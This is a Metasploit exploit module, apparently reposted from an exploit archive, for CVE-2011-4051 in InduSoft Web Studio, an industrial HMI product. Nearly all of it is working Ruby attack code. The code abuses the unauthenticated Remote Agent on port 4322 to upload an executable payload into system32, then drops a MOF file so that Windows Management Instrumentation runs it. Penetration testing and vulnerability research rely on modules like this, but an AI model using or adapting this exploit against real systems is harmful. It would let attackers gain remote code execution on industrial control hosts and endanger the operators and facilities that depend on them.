InduSoft Web Studio Arbitrary Upload Remote Code Execution Vulnerability

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::EXE
  include Msf::Exploit::WbemExec

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'InduSoft Web Studio Arbitrary Upload Remote Code Execution',
      'Description'    => %q{
          This module exploits a lack of authentication and authorization on the InduSoft
        Web Studio Remote Agent, that allows a remote attacker to write arbitrary files to
        the filesystem, by abusing the functions provided by the software.

        The module uses uses the Windows Management Instrumentation service to execute an
        arbitrary payload on vulnerable installations of InduSoft Web Studio on Windows pre
        Vista. It has been successfully tested on InduSoft Web Studio 6.1 SP6 over Windows
        XP SP3 and Windows 2003 SP2.
      },
      'Author'         =>
        [
          'Luigi Auriemma', # Vulnerability Discovery
          'juan vazquez' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2011-4051' ],
          [ 'OSVDB', '77179' ],
          [ 'BID', '50675' ],
          [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-330' ]
        ],
      'Privileged'     => true,
      'Payload'        =>
        {
          'BadChars' => "",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows XP / 2003', { } ],
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Nov 04 2011'))

    register_options([Opt::RPORT(4322)], self.class)
  end

  def check
    connect

    # Get Application version
    data = [0x14].pack("C")
    sock.put(data)
    app_info = sock.get_once
    disconnect

    if app_info =~ /InduSoft Web Studio v6\.1/
      return Exploit::CheckCode::Vulnerable
    elsif app_info =~ /InduSoft Web Studio/
      return Exploit::CheckCode::Detected
    end

    return Exploit::CheckCode::Safe

  end

  def upload_file(filename, my_payload)
    connect

    # Get Application version
    data = [0x14].pack("C")
    sock.put(data)
    app_info = sock.get_once
    if app_info !~ /InduSoft Web Studio/
      print_error("#{@peer} - InduSoft Web Sutio hasn't been detected, trying to exploit anyway...")
    end

    # Get Operating System
    data = [0x13].pack("C")
    sock.put(data)
    os_info = sock.get_once
    if os_info !~ /WINXP/ and os_info !~ /WIN2K3/
      print_error("#{@peer} - Exploitation through Windows Management Instrumentation service only works on windows pre-vista system, trying to exploit anyway...")
    end

    # Upload file

    data = "\x02\x37" # Command => Select destination
    data << [my_payload.length].pack("V") # Data length
    data << "#{filename}" # File name to upload
    data << "\x09\x00\x30\x00\x00\x00"
    data << "\x10\x03" # End of packet

    # The data must be split on 1024 length chunks
    offset = 0 # Data to send
    count = 1 # Number of chunks sent
    groups = 0 # Data must be sent in groups of 50 chunks

    chunk = my_payload[offset, 1024]

    while not chunk.nil?

      # If there is a group of chunks, send it
      if count % 51 == 0

        data << "\x02\x2c" # Command => Send group of chunks
        my_count = [count].pack("V") # Number of chunks
        data << my_count.gsub(/\x10/, "\x10\x10")
        data << "\x10\x03" # End of packet

        sock.put(data)
        res = sock.get_once
        if res !~ /\x02\x06\x10\x03/
          return res
        end

        count = count + 1
        groups = groups + 1
        data = ""

      end

      pkt = [ 0x02, 0x2e ].pack("C*") # Command => Chunk Data
      my_count = [count].pack("V")
      pkt << my_count.gsub(/\x10/, "\x10\x10") # Chunk ID
      pkt << [chunk.length].pack("V").gsub(/\x10/, "\x10\x10") # Chunk Data length
      pkt << chunk.gsub(/\x10/, "\x10\x10") # Chunk Data
      pkt << "\x10\x03" # End of packet

      data << pkt
      offset = (count - groups) * 1024
      chunk = my_payload[offset, 1024]
      count = count + 1
    end

    pkt = [ 0x02, 0x03].pack("C*") # Command => End of File
    my_count = [count].pack("V")
    pkt << my_count.gsub(/\x10/, "\x10\x10") # Chunk ID
    pkt << rand_text_alpha(8) # LastWriteTime
    pkt << rand_text_alpha(8) # LastAccessTime
    pkt << rand_text_alpha(8) # CreationTime
    pkt << "\x20\x00\x00\x00" # FileAttributes => FILE_ATTRIBUTE_ARCHIVE (0x20)
    pkt << rand_text_alpha(1)
    pkt << "\x10\x03" # End of packet
    data << pkt

    sock.put(data)
    res = sock.get_once
    disconnect

    return res

  end

  def exploit

    @peer = "#{rhost}:#{rport}"

    exe = generate_payload_exe
    exe_name = rand_text_alpha(rand(10)+5) + '.exe'

    mof_name = rand_text_alpha(rand(10)+5) + '.mof'
    mof      = generate_mof(mof_name, exe_name)

    print_status("#{@peer} - Uploading the exe payload to C:\\WINDOWS\\system32\\#{exe_name}")
    res = upload_file("C:\\WINDOWS\\system32\\#{exe_name}", exe)
    if res =~ /\x02\x06\x10\x03/
      print_good "#{@peer} - The exe payload has been uploaded successfully"
    else
      print_error "#{@peer} - Error uploading the exe payload"
      return
    end

    print_status("#{@peer} - Uploading the mof file to c:\\WINDOWS\\system32\\wbem\\mof\\#{mof_name}")
    res = upload_file("c:\\WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof)
    if res =~ /\x02\x06\x10\x03/
      print_good "#{@peer} - The mof file has been uploaded successfully"
    else
      print_error "#{@peer} - Error uploading the mof file"
      return
    end

  end

end



#  0day.today [2018-03-05]  #